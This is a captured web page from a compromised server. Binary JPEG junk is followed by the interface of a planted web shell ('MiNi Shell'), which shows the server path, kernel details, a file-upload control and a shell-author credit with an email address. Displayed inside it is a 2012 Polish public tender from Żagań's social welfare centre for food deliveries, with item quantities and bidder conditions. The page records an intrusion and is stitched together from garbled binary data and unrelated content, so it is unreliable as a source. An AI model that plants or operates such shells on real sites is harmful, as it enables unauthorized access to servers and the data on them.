JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120523/168360-N-2012.html

<p class="kh_header"><b>Żagań: Dostawa artykułów żywnościowych do Ośrodka Pomocy Społecznej w Żaganiu</b><br>
<b>Numer ogłoszenia: 168360 - 2012; data zamieszczenia: 23.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Pstrowskiego 3, 68-100 Żagań, woj. lubuskie, tel. 0-68 4781454/55, faks 0-68 4781454/55.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops.zagan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do Ośrodka Pomocy Społecznej w Żaganiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych
Zamawiający udziela zamówienia w 6 częściach, poprzez możliwość złożenia odrębnych ofert na każdą część zamówienia.
Część I - będzie obejmować warzywa i owoce.
Część II - obejmować będzie chleb.
Część III - obejmować będzie mrożone artykuły spożywcze.
Część IV - obejmować będzie jaja kurze.
Część V - obejmować będzie artykuły ogólnospożywcze, 
Część VI - obejmować będzie artykuły nabiałowe
Wykonawca może złożyć ofertę na dowolną ilość części.

Część I dostawa warzyw i owoców

Buraki kg	275
Botwina z min. 4 korzeniami o średnicy min. 4 cm i nacią o długości nie mniejszej niż 25 cm,	pęcz.40
Cebula kg 315
Czosnek główka o średnicy nie mniejszej niż 5 cm szt.10
Fasola Jaś, kg 90
Fasola szparagowa,kg 120
Groch łuskany,kg 120
Jabłka winne o gramaturze 1 jabłka nie mniejszej niż 20 dkg,kg 175
Kapusta biała, kg 345
Kapusta młoda o wadze 1 główki nie mniejszej niż 2,5 kg,szt. 200
Kapusta czerwona	kg 105
Kapusta kiszona	kg 280
Kapusta pekińska	kg 260
Kalafior o wadze 1 główki nie mniejszej niż 1,5 kg,szt. 70
Koper o wadze 1 pęczka nie mnie mniejszej niż 10 dkg pęcz.90
Marchew	kg 825
Natka pietruszki o wadze 1 pęczka nie mniejszej niż 10 dkg, pęcz. 380
Ogórki kiszone	kg 200
Ogórki świeże	kg 160
Papryka	kg 50
Pieczarki	kg 140
Pietruszka kg 280
Pomarańcze kg 10
Pomidory	kg 650
Por o długości nie mniejszej niż 30 cm    i średnicy korzenia nie mniejszej niż 4 cm szt.30
Sałata o wadze 1 główki nie mniejszej niż 40 dkg, szt. 340
Seler z nacią o długości naci nie mniejszej niż 20 cm i średnicy korzenia nie mniejszej niż 5 cm	szt.60
Seler ,kg	290
Śliwka węgierka,kg	20
Szczaw świeży o wadze 1 pęczka nie mniejszej niż 20 dkg, pęcz.60
Truskawka,kg 20
Wiśnia,kg	20
Ziemniaki jadalne,kg 10.000

Część II dostawa chleba

Chleb zwykły krojonyo wadze 600g,szt. 8.100

Część III dostawa mrożonych artykułów spożywczych

Brukselka mrożona,	kg 90
Fasolka szparagowa, kg 90
Groszek zielony mrożony,kg	90
Kalafior mrożony, kg 90
Mieszanka kompotowa składająca się z min 4 owoców, kg	100
Śliwka mrożona, kg	20
Truskawka mrożona, kg 15
Wiśnia mrożona, kg 50
Filet z miruny ze skórą bez glazury SHP, kg 170

Część IV dostawa jaj kurzych 

Jaja kurze M - średnie  szt.	3800

Część V dostawa artykułów ogólnospożywczych

Bazylia 20g,szt. 35
Bułka tarta,kg 80
Cukier biały,kg 330
Cukier waniliowy 32g,szt.2
Chrzan konserwowy opakowanie 190g,	szt.40
Cynamon 20g,szt.	6
Czosnek granulowany 30g,szt.200
Drożdże, opakowanie 100g,szt.25
Galaretka wielosmakowa (wiśniowa, truskawkowa, agrestowa, pomarańczowa), opakowanie 80g, szt.600
Groszek konserwowy w puszce o wadze 400g, szt.20
Herbata rozpuszczalna granulowana 400g, szt.30
Kasza jęczmienna, opakowanie 1 kg, kg100
Kasza manna, opakowanie 1 kg, kg 2
Kisiel 40g (różne smaki), szt.	30
Klopsy wieprzowe w sosie pomidorowym, opakowanie 500g
Skład: woda, mięso wieprzowe mon. 26%, warzywa, mąka pszenna, koncentrat pomidorowy, sól, tłuszcz roślinny, przyprawy, wartość energetyczna min. 110 kcal/100g, szt. 250
Kukurydza konserwowa w puszce o wadze 340g, szt.150
Koncentrat pomidorowy 30% o wadze 190g, szt. 670
Kwasek cytrynowy 74g, szt.80
Liść laurowy 5g,s zt.50
Majeranek 20g, szt. 150
Majonez 620g,
Składniki: olej roślinny, woda, ocet spirytusowy, cukier, sól, żółtko, wartość energetyczna 611kcal/100g), szt. 12
Makaron łazanki, kg 20
Makaron nitki, kg 20
Makaron spaghetti, kg 120
Makaron świderki,	kg 100
Makaron zacierka,	kg 10
Mąka pszenna tortowa , kg 230
Mąka ziemniaczana, kg 20
Musztarda sarepska 210g, szt. 40
Ocet spirytusowy,	l 4
Ogórki konserwowe opakowanie 900g,	szt. 290
Olej rzepakowy, l 400
Papryka ostra 20g,	szt. 20
Papryka słodka 30g, szt. 80
Pieprz czarny mielony 20g, szt. 200
Pieprz ziołowy 30g,	szt. 250
Przyprawa do flaków 20g, szt. 15
Przyprawa do kurczaka 25g,	szt. 30
Przyprawa warzywna do potraw opakowanie 750g,
Skład: warzywa suszone 7,5% (marchew, ziemniaki, pasternak, cebula, seler, natka pietruszki), sól, cukier, szt. 200
Przyprawa w płynie do zup, sosów, sałatek, opakowanie 1 kg
Składniki: woda, sól, ocet, glukoza, aromaty (seler) 1, ekstrat z lubczyka, kg 150
Ryż długoziarnisty, opakowanie 1 kg, kg 80
Sałatka wielowarzywna 900g ,
Skład: marchew, ogórki, cebula, papryka, woda. cukier, sól, szt. 100
Sos do spaghetti 20g, szt. 100
Sól, kg 170
Syrop owocowy 400ml, szt. 15
Szczaw konserwowy o wadze opakowania 280g, szt.20
Filet śledziowy solony, kg 100
Ziele angielskie 12g, szt. 50
Zupa żurek 66g ,
Skład: mąka żytnia, mąka pszenna, mleko odtłuszczone w proszku, mąka ryżowa, tłuszcz roślinny, ekstrakty drożdżowe suszone, cukier, regulator kwasowości, aromat dymu wędzarniczego, koncentrat czosnku szt. 300

Część VI dostawa produktów nabiałowych

Mleko 1.5%tł. UHT  1l, l 20
Mleko 2%tł.1l, l 300
Jogurt z kawałkami owoców, opakowanie 150g,	szt. 3000
Masło 82% tłuszczu 200g, szt. 60
Margaryna o zmniejszonej zawartości tłuszczu, opakowanie 600g; Wartość odżywcza 370kcal/100g, białko,0,55g, węglowodany 2g, tłuszcz ok. 40g,szt.	5
Ser twarogowy półtłusty, opakowanie 250g, kg 60
Ser żółty, kg 25
Ser topiony kostka kremowy opak. 100 g, szt. 400
Śmietana 18% opakowanie 400ml, szt.	1000

Informacje dodatkowe do przedmiotu zamówienia
Cykliczne dostawy będą realizowane jak następuje:
Część I warzywa i owoce,
Część III dostawa mrożonych artykułów spożywczych 
Część IV jaja kurze świeże,
Część V dostawa artykułów ogólnospożywczych, 
Część VI dostawa produktów nabiałowych
 - w następnym dniu po złożeniu zamówienia w godzinach od 7.00 do 14.00.
Część II chleb - w następnym dniu od złożenia zamówienia, codziennie od poniedziałku do piątku w godzinach od 7.00 do 10.00,
Artykuły żywnościowe zamawiane będą przez pracownika Zamawiającego telefonicznie, 
z podaniem rodzaju oraz ilości produktów.
Cykliczne dostawy realizowane będą środkiem transportu Wykonawcy i na jego koszt do siedziby Zamawiającego znajdującej się w Żaganiu przy ul. Pstrowskiego 3.

Wymagania stawiane Wykonawcy:

1) Wykonawca odpowiedzialny jest za zgodność z warunkami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia.
2) Dostawa artykułów żywnościowych powinna odbywać się środkiem transportu spełniającym obowiązujące wymagania sanitarne dla danej części zamówienia.
3) Wykonawca odpowiedzialny jest za terminowe wykonanie zamówienia, 
4) Każda dostawa towaru wymagająca załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument,
5) Wykonawca zobowiązany jest do dostarczania artykułów żywnościowych w pierwszej klasie jakości.
6) Artykuły spożywcze muszą być dostarczane w ich początkowym okresie przydatności do spożycia,
7) Dostarczane artykuły muszą być dobrej jakości pod względem organoleptycznym (wygląd, smak, zapach),
8) Zamawiający zastrzega sobie prawo odmowy odbioru dostarczanych artykułów żywnościowych w przypadku stwierdzenia ich wad jakościowych.
9) W razie stwierdzenia dostawy artykułów żywnościowych złej jakości, Wykonawca zobowiązany jest do niezwłocznej wymiany towaru.
10) Dostawy winny odbywać się w odpowiednio przystosowanych pojemnikach (opakowaniach) stanowiących własność Wykonawcy i spełniających wymagania przewidziane do przechowywania żywności. Opakowania zwrotne Zamawiający zwróci przy kolejnej dostawie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-9, 15.81.10.00-6, 15.33.11.70-9, 03.14.25.00-3, 15.80.00.00-6, 15.50.00.00-3, 14.00.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania przez Wykonawcę uprawnień do wykonywania określonej działalności lub czynności, Zamawiający nie żąda od Wykonawcy potwierdzenia posiadania uprawnień do wykonywania działalności, gdyż przepisy prawa nie nakładają obowiązku posiadania takich uprawnień;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania wiedzy i doświadczenia Zamawiający uzna za spełniającego ten wymóg Wykonawcę, który w okresie ostatnich  trzech lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonał co najmniej jedną dostawę, odpowiadającą przedmiotowi zamówienia o wartości brutto nie mniejszej jak:
8.000,00 zł. dla części I - warzywa i owoce,
5.000,00 zł. dla części II - chleb,
2.000,00 zł. dla części III - mrożone artykuły spożywcze,
800,00 zł. dla części IV - jaja kurze,
6.000,00 zł. dla części V - artykuły ogólnospożywcze,
2.500,00 zł. dla części VI - artykuły nabiałowe
Na potwierdzenie spełnienia tego warunku Wykonawca złoży wraz z ofertą dokument określony w punkcie 6.1 litera b SIWZ. 
Wykonawcy występujący wspólnie powyższy warunek mogą spełnić łącznie. 
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę mającego siedzibą lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio dla miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu;
Jeżeli Wykonawca wykazując spełnienie warunku posiadania wiedzy i doświadczenia, potencjału technicznego, polega na zasobach innych podmiotów i podmioty te będą brały udział w realizacji części  zamówienia, Wykonawca jest zobowiązany przedstawić w odniesieniu do tych podmiotów oświadczenie o braku podstaw do wykluczenia z postępowania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.
Umowa zostanie zawarta na warunkach podanych w Specyfikacji Istotnych Warunków Zamówienia- zgodnie z projektem umowy stanowiącym załącznik nr 7 do niniejszej SIWZ. Umowa podlega unieważnieniu w części wykraczającej poza określenie przedmiotu zamówienia zawarte w Specyfikacji Istotnych Warunków Zamówienia.
Umowa wymaga, pod rygorem nieważności zachowania formy pisemnej.
Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienia zabezpieczenia należytego wykonania umowy- jeżeli Zamawiający żąda takiego zabezpieczenia.
Umowę zawiera się na czas oznaczony.
Zamawiający na podstawie art.144 ust.1i2 Ustawy Prawo zamówień publicznych dopuszcza możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.
W zakresie wartości wynagrodzenia:
- w przypadku zmniejszenia zapotrzebowania na dostawę artykułów żywnościowych Zamawiający zastrzega możliwość zmniejszenia ilości dostarczanych artykułów żywnościowych w każdej części zamówienia o maksymalnie 20% ilości wskazanych w zawartej umowie. Z tytułu zmniejszenia ilości dostarczanych artykułów żywnościowych nie przysługują Wykonawcy żadne roszczenia cywilnoprawne.
Zmiana umowy dokonana z naruszeniem warunku określonego w punkcie 16.6 SIWZ podlega unieważnieniu.
16.8. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W tym przypadku wykonawca może żądać wyłącznie wynagrodzenia należnego w tytułu wykonania części umowy.
16.9. W przypadku powstania jakiejkolwiek szkody na skutek nie wykonania lub wadliwego wykonania dostaw objętych zamówieniem, Wykonawca dostaw zobowiązany jest do pokrycia całej powstałej szkody.
16.10. Obowiązującą formą odszkodowania uzgodnioną między stronami będą kary umowne.
16.11. Strony zastrzegają sobie prawo dochodzenia odszkodowania uzupełniającego do wysokości rzeczywiście poniesionej szkody.
16.12. Zamawiający nie przewiduje możliwości udzielenia zaliczek na poczet wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.zagan.pl /BIP/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Żaganiu
ul. Pstrowskiego 3
68-100 Żagań
pokój nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2012 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej w Żahaniu
ul. Pstrowskiego 3
68-100 Żagań
pokój nr 19 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia np. w formie konsorcjum. 
W przypadku wspólnego ubiegania się, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i   zawarcia umowy w sprawie zamówienia publicznego. Na potwierdzenie ustanowienia pełnomocnika Wykonawcy załączają do oferty stosowne pełnomocnictwo. 
Jeżeli oferta Wykonawców ubiegających się wspólnie o udzielenie zamówienia, zostanie wybrana, Zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej  współpracę tych Wykonawców. 

Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów żądanych przez Zamawiającego, na zasadzie spełnia /nie spełnia. Z dokumentów i oświadczeń musi wynikać, iż Wykonawca spełnia warunki udziału w postępowaniu na dzień składania ofert. W przypadku niespełnienia jakiegokolwiek warunku udziału w postępowaniu albo nie wykazania w wystarczający sposób potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawca zostanie wykluczony z postępowania na podstawie art.24 ustawy Prawo zamówień publicznych - po wyczerpaniu czynności związanych z wezwaniem do uzupełnienia dokumentów lub oświadczeń.
Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com